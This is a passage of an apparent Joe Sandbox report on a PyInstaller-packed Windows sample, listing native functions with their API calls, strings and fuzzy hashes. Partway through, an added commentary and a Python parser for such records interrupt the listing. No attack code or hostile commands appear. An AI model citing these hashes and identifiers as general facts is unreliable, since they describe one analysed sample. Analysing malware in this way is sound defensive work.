                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0126F27E0C14386FB20BB55E854A7AB6A1FF41754FC84275E699C7AC4DB7CF4808B28
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                      • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                      • Instruction ID: a248880fead195cb1ab725df0f711a1e996be168116a9ace3cb82bac07519c0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B413862A0865782FA10FB12EC05ABAE294EF44BD4FC445B2EE0D47796DF3CE5068760
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                      • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                      • Instruction ID: e45dbdb3be9714d06b22e304a62f245d1d097fe5803ca5abcee55ad778157d8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D413723A0864786FA10FB21D8426B9E390EF44B94FC446B2EE4D47B95EF3CF5068764
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                      • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                      • Instruction ID: bfec44de1876ea28f3624deee92e70e8bc37a694104285b7e9ee505838002286
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AD16D63A0874286FB20BB25D8423ADA7A0FF45798FD00176EA8D57BA9DF38F441C711
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2D63
• MessageBoxW.USER32 ref: 00007FF70AEF2D99
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction ID: 12dc2291aee8245a9d18ffdee8ed57ec0f5cef330ac0c4d765d1565b486e1053
• Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction Fuzzy Hash: 9631B323B08A4142F620BB25EC156EAA695FF88798FC14135EF4D93759DF3CE506C710

APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDBD
• GetLastError.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDCB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDF5
• FreeLibrary.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDE63
• GetProcAddress.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDE6F
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction ID: cc66b3c5d4467c0075645944493140a5e6dad2682cf7b121df0e3f9a2f4c1bff
• Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction Fuzzy Hash: 88318B22F1A64281FE22BB02EC41565A794FF58BA4FC94675ED1D46388EF3CE4448224

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
• Instruction ID: 88587a5671963cb955d4971628a23e56fb313766598f750cfac131ffd9d38267
• Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
• Instruction Fuzzy Hash: CC413E23A1868791FA15FB21E8562EAA361FF54384FD00172EA5D436D6EF3CF606C760

APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF70AEF351A,?,00000000,00007FF70AEF3F23), ref: 00007FF70AEF2AA0
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction ID: 8cdc0f49be2dd7766074a35e68569faeaed3c6dc878683c2af4b61d902c2d542
• Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction Fuzzy Hash: 1A217F33A18B8282F620EB51F8417E6A394FF88784F800176EE8C53759DF3CE6468750

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
• Instruction ID: 332f2f7501106a782f7626f4e827d6e97407edf2c114301820b3b1ab2a20fe71
• Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
• Instruction Fuzzy Hash: E4214C22F0D24685FA69B761DE5193DE2425F447E0F9447B4D93E86AD6DF2CF8418320
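The entries above are Joe Sandbox IDA-plugin records for the sample's native stub. Their strings (`[PYI-%d:ERROR]`, `[PYI-%d:%s]`, `Failed to load Python DLL '%ls'.`, `ucrtbase.dll`) are the PyInstaller bootloader's own error and warning messages, and the `LoadLibraryExW`/`GetProcAddress` entry keyed on `api-ms-` is the CRT's API-set resolution, so these functions identify the packer, not the payload. As an added example that is not part of the Joe Sandbox report, the Python below parses such entries into records, flags the PyInstaller marker strings, and indexes entries by `API String ID` and `Instruction Fuzzy Hash` so a listing can be compared against another sample's. The sample input is an excerpt copied from the entries above (abridged: most repeated "Associated" dump lines dropped, three entries kept); the record layout, the marker list and the exact-match hash comparison are this example's own assumptions.

```python
"""Parse Joe Sandbox IDA-plugin function entries into records (added example)."""
import re
from dataclasses import dataclass, field

# Constructed input: an abridged excerpt of the listing above. One "Associated"
# line keeps the "Download File" residue the page extraction leaves behind.
SAMPLE = """\
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2D63
• MessageBoxW.USER32 ref: 00007FF70AEF2D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Instruction Fuzzy Hash: 9631B323B08A4142F620BB25EC156EAA695FF88798FC14135EF4D93759DF3CE506C710
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDBD
• GetProcAddress.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDE6F
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Instruction Fuzzy Hash: 88318B22F1A64281FE22BB02EC41565A794FF58BA4FC94675ED1D46388EF3CE4448224
Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Instruction Fuzzy Hash: CC413E23A1868791FA15FB21E8562EAA361FF54384FD00172EA5D436D6EF3CF606C760
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or, with no argument list, "Name.MODULE ref: ADDR"
API_RE = re.compile(r"^(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$")
# Assumed marker substrings; "[PYI-<pid>:...]" is the PyInstaller bootloader log prefix.
PYINSTALLER_MARKERS = ("[PYI-", "Failed to load Python DLL", "Python shared library")
RESIDUE = "Download File"  # interactive-page text glued onto dump names by extraction


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def fuzzy_hash(self):
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_entries(text):
    """Split a listing into entries; an entry ends at its "Instruction Fuzzy Hash"
    line, so a truncated trailing entry without one is discarded."""
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                name, module, args, ref = m.groups()
                cur.apis.append(ApiCall(name, module, args.split(",") if args else [], ref))
            continue
        key, _, value = body.partition(":")  # first colon only: values contain colons
        key, value = key.strip(), value.strip()
        if value.endswith(RESIDUE):
            value = value[:-len(RESIDUE)]
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]  # "$"-joined; drop empties
        if key == "Associated":
            cur.fields.setdefault(key, []).append(value)
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def pyinstaller_entries(entries):
    """Entries whose strings carry a PyInstaller bootloader marker."""
    return [e for e in entries if any(m in s for s in e.strings for m in PYINSTALLER_MARKERS)]


def index_by_api_string_id(entries):
    """Map the report's "API String ID" to its entry for cross-sample lookup."""
    return {e.fields["API String ID"]: e for e in entries if "API String ID" in e.fields}


def shared_fuzzy_hashes(entries_a, entries_b):
    """Instruction Fuzzy Hash values present in both listings. Exact match only:
    the report does not document the hashing scheme, so no distance is computed."""
    return {e.fuzzy_hash for e in entries_a} & {e.fuzzy_hash for e in entries_b}


if __name__ == "__main__":
    for e in pyinstaller_entries(parse_entries(SAMPLE)):
        print(e.fields["API String ID"], [c.name for c in e.apis], e.strings[:2])
```

Feed it the whole function listing of two reports and `shared_fuzzy_hashes` gives the functions that are byte-for-byte the same by the report's own hash, which for a PyInstaller sample is mostly the bootloader; the interesting payload code lives in the bundled Python archive, not in these native entries.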
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction ID: aebd536bef85ee6787254642d746a649452eb8ffc433648ac6e1b80d8c92bece
• Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7119D22B18A4186F350AB52EC54329E6A0FF88BF4F904274EA5D877A4DF7CE804CB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF8592
                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF85E9
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF70AEF45E4,00000000,00007FF70AEF1985), ref: 00007FF70AEF9439
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF8678
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF86E4
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF86F5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF870A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                                                      • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                      • Instruction ID: f7ba80ca8781e62366874c789aedbf9145c96c5a1d33406980dc604efaa5add8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F415C63B1968781FA20BB12ED416AAA394FF84BC4FC50175DE8D97B89DF3CE5058720
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B347
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B37D
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3AA
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3BB
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3CC
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                      • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                      • Instruction ID: 1ff7f6feb3d3f40b8a80747166ce22bd4b0b88237d7025c5fa124f384b9a09e9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2112E22B0D64282FA68B761DE5193DE1429F487B0FE447B4E97E867D6DF2CF4018321
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF70AEF1B6A), ref: 00007FF70AEF295E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                      • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                      • Instruction ID: 194f62f0b776a1e1085f08ae78625cb99e0488608ee2db1e943f145d75b4d112
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
